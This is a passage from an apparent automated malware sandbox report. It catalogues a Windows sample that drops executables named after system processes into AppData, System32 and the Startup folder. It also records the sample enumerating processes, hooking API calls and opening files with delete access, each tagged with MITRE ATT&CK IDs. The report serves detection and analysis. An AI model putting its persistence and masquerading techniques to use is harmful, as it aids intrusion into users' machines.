\"WINLOGON.EXE\" wrote 46776 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46852 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46725 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46885 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46889 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46863 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46819 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46981 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46767 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46846 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46871 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46798 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46867 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46951 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46743 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46948 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46874 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47002 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46799 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46788 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46811 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46960 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46719 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46847 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46924 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46817 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46901 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46909 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46698 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46761 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46754 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46785 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46853 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46874 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00003904]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00003904]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00003904]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67E3CEFD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003904]\n \"D3_08.EXE.67E3CC76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003904]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003904]\n \"IEXPLORER.EXE.67E3D138.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00003904]\n \"IEXPLORER.EXE.67E3CC79.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003904]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00003904]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00003904]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003904]\n \"D3_08.EXE.67E3D133.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToLocalFileTime\" with parameter 3a0189452b9edb01 & :iM (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToLocalFileTime\" with parameter e4640ba52b9edb01 & e4cccf06349edb01 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToLocalFileTime\" with parameter bca0e1a52b9edb01 & bc08a607349edb01 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FileTimeToLocalFileTime\" with parameter 90045acc2b9edb01 & 906c1e2e349edb01 (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindResourceW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"OpenMutexW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINLOGON.EXE\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\System32\\dinotify.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n 